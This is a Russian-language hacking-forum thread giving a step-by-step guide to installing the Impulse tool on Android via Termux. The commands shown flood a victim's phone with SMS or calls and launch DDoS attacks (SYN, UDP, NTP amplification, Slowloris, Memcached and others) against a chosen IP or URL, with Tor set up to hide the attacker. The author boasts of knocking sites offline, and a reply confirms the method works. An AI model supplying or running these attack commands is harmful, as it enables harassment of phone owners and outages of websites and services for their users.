Загрузка...

Мощный бомбер на Androdе (termux).

Тема в разделе Социальная инженерия создана пользователем Sut1she 5 ноя 2020. (поднята 18 янв 2022) 64 601 просмотр

Загрузка...
  1. Sut1she
    Sut1she Автор темы 5 ноя 2020 Заблокирован(а) 64 31 янв 2018
    Итак, это краткая статья по установке мощного бомбера на termux. термукс хорош тем, что он нетребовательный ко всему, кроме интернета. его нужно много (если вы не не WiFi/безлимите) и он должен быть быстрым. Итак, прежде распишу что и как. Таких статей я тут не нашел, так-что терпите меня. Подойдет для многого. если для блока телефона для безпрепятственного захода в вк/инстаграм/дноклассники больше подойдет калспамер(callspamer). может позже его разберу.
    ( она поддерживает 8 разных видов DoS и DDoS атак, таких как: усиление NTP, SYN, TCP SYN, UDP-поток, POD (Ping of Death), Slowloris, Memcached и прочие)
    Сам не пользуюсь ничем, кроме спама на телефон. гугл не положишь, а вот сайт с донатами майнкрафта можно с некоторыми усилиями.

это не ПРОФЕССИОНАЛЬНЫЙ способ, но он вполне ХОРОШИЙ и зависит от состояний ИНТЕРНЕТА (ТАК ЧТО ЕСЛИ У ВАС ОТПРАВИЛОСЬ ТОЛЬКО 2 ПОТОКА, ЭТО НЕ ВИНА УТИЛИТЫ!!!). Также замечу, что если телефон совсем помойный (за 2.3к в переходе у Ашота) тоже будет низкая эффективность. а так, любой телефон созданный в 14-13 году и позже очень хорошо справиться с задачами.

Стало интересно, о чем я буду рассказывать? об утилите работающей на TERMUX.
    сам спамер называется Impulse, я сам им пользовался и пользуюсь, ведь его мощь не хуже, а ИНОГДА и лучше многих приватных.
    вот фотография выложенная на гитхаб. она почти ничем не отличается от телефонной версии. абсолютно.
    Установка:

apt update && apt upgrade

apt install python python2 git

pip install requests

далее клонируем реппозиторий (это место где хранятся файлы)

git clone https://github.com/LimerBoy/Impulse

cd Impulse

нужно установить зависимость (не наркотическую)

pip install -r requirements.txt

Установили? теперь разберем сам флуд/DDos

python impulse.py --method SMS (вместо смс можно написать CALL) --target [номер телефона] --time 9999 --threads 500

--method SMS
    — означает, что мы выбираем flood звонками/sms

--target ххххххххх — вместо ххххххххх номер телефона начиная с 7 или 380 (если вы живете в Украине)

--time 20 — вместо числа 20 можно указать кол-во секунд спама, то есть время проведения спамерской атаки

--threads 2 — цифра 2 представляет собой кол-во потоков, по которым будет проводиться флуд. На самом деле, чем больше, тем лучше. Если поставите больше 50-100, то вашему телефону хана на время проведения атаки

А
    х да, совсем забыл..
    нужно УСТАНОВИТЬ TOR
    Это нужно делать до всех атак и использования утилит. это даст анонимнсть (ip с которого будет запрос будет изменен цепями тор)
    Установка TOR
    apt update & apt upgrade

pkg install

Вы его установили. теперь его нужно запустить

запуск

tor

если все прошло успешно, то в конце команд(в нижней части терминала) будет написано "boostrapped 100%"

после запускайте все свои зловреды.

ВАЖНО: на этот раз я сам писал статью. нигде ничем не вдохновлялся, а только взял команды из того старенького мануала.

теперь рассмотрим DDos атаки:

python impulse.py --method [в таблице, в ячейке метод] --target [ip]:[port] --time 20 --threads 2

--method [название метода] — Их 8! В таблице ниже указано подробное описание каждого.

--target ip:port — Обычно, в этом пункте надо указывать связку ip:port. Но при использование POD нужно использовать только IP адрес, а при использование HTTP только URL-Адрес.

На этом всё.
    Ограничение ответов в теме:
    Автор темы разрешил отвечать в теме только этим группам (и вышестоящим): Местный, Команда форума и Кураторы.

Этот материал оказался полезным?
    Вы можете отблагодарить автора темы путем перевода средств на баланс
    Отблагодарить автора
  2. GoSteax
    GoSteax 16 ноя 2020 Выращиваю овощную грядку, у себя в профиле 43 4 май 2017
    Давно таким баловался, рабочая тема)